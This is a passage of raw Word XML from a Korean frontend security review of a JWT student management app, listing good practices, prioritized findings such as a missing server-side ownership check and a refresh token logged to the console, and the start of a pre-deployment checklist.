            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:157</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-177(logout()) — 160-161행 토큰 삭제 먼저, 171행 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>logoutRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>() 호출</w:t>
            </w:r>
            <w:r w:rsidR="005120DE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="005120DE" w:rsidRPr="005120DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>: 클라이언트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토큰을 먼저 지우고 화면을 즉시 로그인 상태로 바꾼 뒤, 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을 서버에 보내 DB에서도 폐기한다. 순서를 이렇게 둔 이유는 서버 요청이 느리거나 실패해도 사용자 화면은 이미 로그아웃</w:t>
            </w:r>
            <w:r w:rsidR="005120DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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되어 있어야 하기 때문이다(171-175행: 실패해도 무시). 단, 서버 폐기가 실패하면 그 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refreshToken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은 만료 전까지 DB에 유효하게 남아 탈취 시 재사용될 여지가 있다.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lastRenderedPageBreak/>
              <w:t>UI는 표시, 차단은 서버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pages/StudentListPage.jsx</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:74</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-76(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>isAdmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 아니면 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MyStudentLookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>), pages/StudentFormPage.jsx:89-96(403 catch → /students로 이동)</w:t>
            </w:r>
            <w:r w:rsidR="005120DE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="005120DE" w:rsidRPr="005120DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>: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r w:rsidR="005120DE" w:rsidRPr="005120DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>프론트의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isAdmin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분기는 "일반 사용자에게 관리자용 화면을 아예 보여주지 않는" UI 편의 처리일 뿐, 실제 접근 차단은 아니다. 개발자도구로 조작해 관리자 화면 URL에 진입하거나 /students/{id}/edit의 id를 바꿔도, 서버가 매 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요청마다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AccessControl.isOwner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로 재</w:t>
            </w:r>
            <w:r w:rsidR="008C3E11">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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>검증</w:t>
            </w:r>
            <w:r w:rsidR="008C3E11">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>하여</w:t>
            </w:r>
            <w:r w:rsidR="005120DE" w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 403을 돌려주고(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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StudentService</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005120DE" w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>), 프론트는 그 403을 받은 뒤에야 화면을 /students로 되돌릴 뿐이다. 즉 "보여주지 않음"과 "막음"은 레이어가 다르며, 실제 방어선은 항상 서버 쪽 권한 검사다.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fail-closed 기본값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 xml:space="preserve">store/authStore.js:108(roles: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>data.roles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ?? []), 221(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>selectIsAdmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">), 197-201(restore() 실패 시 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>clearToken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005120DE" w:rsidRPr="00EF6079" w:rsidRDefault="005120DE" w:rsidP="00EF6079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: </w:t>
            </w:r>
            <w:r w:rsidR="00EF6079" w:rsidRPr="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>fail-closed 기본값 — authStore.js</w:t>
            </w:r>
            <w:proofErr w:type="gram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:108</w:t>
            </w:r>
            <w:proofErr w:type="gram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(roles: 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data.roles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 ?? []), 221(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selectIsAdmin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), 197-201(restore() 실패 시</w:t>
            </w:r>
            <w:r w:rsidR="00EF6079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proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>clearToken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00EF6079">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00EF6079" w:rsidRPr="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>roles나 서버 응답이 비정상(undefined 등)</w:t>
            </w:r>
            <w:proofErr w:type="gram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이어도 ?</w:t>
            </w:r>
            <w:proofErr w:type="gram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? []로 빈 배열이 되어 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selectIsAdmin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(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roles.includes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("ROLE_ADMIN"))은 항상 false로 귀결된다. restore()가 실패해도(197-201행) 토큰을 지우고 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비로그인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 상태로 되돌린다. 즉 애매하거나 실패한 상황이면 전부 "권한 없음/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비로그인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" 쪽으로 기본값이 잡혀, 판단 불가 상태가 실수로 관리자 권한이나 로그인 상태로 </w:t>
            </w:r>
            <w:r w:rsidR="00EF6079">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>허용되는</w:t>
            </w:r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 경우가 없다.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안전한 요청 구성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  <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/studentApi.js</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:41</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-43·62-64(쿼리는 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>params</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">). </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/client.js</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:44</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-46(Content-Type 헤더를 직접 지정하지 않아 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">가 본문 유무로 자동 결정) — 경로 id </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>인코딩은</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>미적용</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(7-2 #3)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EF6079" w:rsidRPr="008A4771" w:rsidRDefault="00EF6079">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18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: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF6079">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>검색어·페이지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등 쿼리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파라미터는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문자열을 직접 이어 붙이지 않고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axios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params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객체로 넘겨,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axios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가 알아서 URL 인코딩한다(한글·공백·특수문자가 들어가도 깨지거나 쿼리 구조가 뒤틀리지 않음). Content-Type도 직접 지정하지 않아, 본문이 있는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요청에만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axios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>가 자동으로 application/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json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을 붙이고 GET처럼 본문 없는 요청엔 불필요한 preflight(OPTIONS)가 생기지 않는다. 다만 경로 변수(`/students/${id}`)는 이런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인코딩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처리를 거치지 않고 템플릿 문자열로 직접 꽂아 넣는다 — id가 항상 숫자인 현재 구조에선 문제가 없지만, 임의 문자열이 올 수 있는 경로라면 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encodeURIComponent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처리가 별도로 필요하다는 점은 남아 있는</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 주의할 점이다.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중복 제출 방지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F6079" w:rsidRPr="00EF6079" w:rsidRDefault="00CA1CCE" w:rsidP="00EF6079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r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pages/LoginPage.jsx</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:111</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(disabled={loggingIn}), components/StudentForm.jsx:128(disabled={saving})</w:t>
            </w:r>
            <w:r w:rsidR="00EF6079">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00EF6079" w:rsidRPr="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00EF6079" w:rsidRPr="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>- disabled={</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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loggingIn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EF6079" w:rsidRPr="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>} / disabled={saving} → 버튼을 두 번 "클릭"하는 것만 막습니다. React 상태(saving=true)가 버튼을 잠그는 동안에는 두 번째 클릭 자체가 발생하지 않습니다.</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w:rsidR="00EF6079" w:rsidRPr="00EF6079" w:rsidRDefault="00EF6079" w:rsidP="00EF6079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>- 하지만 같은 요청이 실제로 두 번 서버에 도달하는 상황은 못 막습니다. 예를 들어:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EF6079" w:rsidRPr="00EF6079" w:rsidRDefault="00EF6079" w:rsidP="00EF6079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 - Burp Repeater나 스크립트로 같은 POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>/students 요청을 수동으로 두 번 전송</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EF6079" w:rsidRPr="00EF6079" w:rsidRDefault="00EF6079" w:rsidP="00EF6079">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16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 - 느린 네트워크에서 브라우저/프록시가 자동으로 요청을 재시도</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EC19AC" w:rsidRPr="008A4771" w:rsidRDefault="00EF6079" w:rsidP="00EF6079">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6079">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  - 두 개의 탭을 열어 두고 각각에서 버튼을 누름(각 탭은 서로의 saving 상태를 모름)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50" w:rsidTr="00EF6079">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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비밀번호를 코드에 적지 않음</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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pages/LoginPage.jsx</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:117</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-126 — 테스트 계정은 API_SPEC.md로만 안내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2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7-2. 개선 권장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"/>
        <w:gridCol w:w="2166"/>
        <w:gridCol w:w="2978"/>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="2258"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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위치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발견 내용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중요도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Default="00CA1CCE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권장 조치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1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백엔드 controller/StudentSearchController.java</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:16</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-19(@PreAuthorize로 ROLE_USER/ROLE_ADMIN만 검사, 소유권 조건 없음)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소유권 검사 없음. 프론트는 UI 숨김으로만 대응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높음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서버에서 ROLE_ADMIN 제한 또는 소유권 조건(3장)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2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api/client.js:155-158 — refreshAccessToken() catch(refreshError) { console.error(...) }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axios 원본 오류를 출력 → config.data의 refreshToken이 콘솔에 남음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중간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message·status만 로그, 운영 빌드 console 제거(4-6)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3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api/studentApi.js:69-72(fetchStudent), 95-98(updateStudent), 100-104(deleteStudent)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경로 id를 인코딩·검증 없이 붙임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중간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숫자 검사 + encodeURIComponent(4-4)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4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lib/token.js:44-48(getRefreshToken·setRefreshToken·clearRefreshToken)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14일짜리 refreshToken을 sessionStorage에 보관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중간(교육용 수용)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운영은 HttpOnly 쿠키(4-1)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5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Student_JWT security/controller/dto/SignUpRequest.java:27(@Size(min = 4))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비밀번호 4자 이상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중간(교육용 수용)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운영은 서버 정책 강화(4-7)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6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 xml:space="preserve">pages/LoginPage.jsx:44(const from = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>location.state?.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>from ?? DEFAULT_AFTER_LOGIN)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location.state.from을 검증 없이 navigate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낮음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내부 경로만 허용(4-5)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7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store/authStore.js</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:167</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — useStudentStore.getState().reset()만 호출(departmentStore·messageStore에는 reset 자체가 없음)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다른 store가 초기화되지 않음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낮음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store별 reset을 logout에서 호출(4-12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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1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lib/token.js</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:12</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-13(sessionStorage 선택 이유 주석)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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"갱신(refresh) API가 없어서" — 현재 구조와 다름</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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정보</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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19AC" w:rsidRPr="008A4771" w:rsidRDefault="00CA1CCE">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>주석 갱신</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00EC19AC">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>8. 배포 전 보안 점검 체크리스트</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>코드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  dangerouslySetInnerHTML · innerHTML · eval · new Function이 없다(있다면 정제 근거가 있다).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐  입력 URL을 href·src에 넣는 곳은 스킴을 검사한다. API 경로 값은 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>인코딩</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">·형식 검사, 쿼리는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00FE0C9A">
        <w:t>xios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>params</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0C9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE0C9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용해야 함</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  콘솔 로그에 토큰·비밀번호·개인정보·axios 원본 오류가 없다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>☐  리다이렉트 대상은 내부 경로만 허용한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
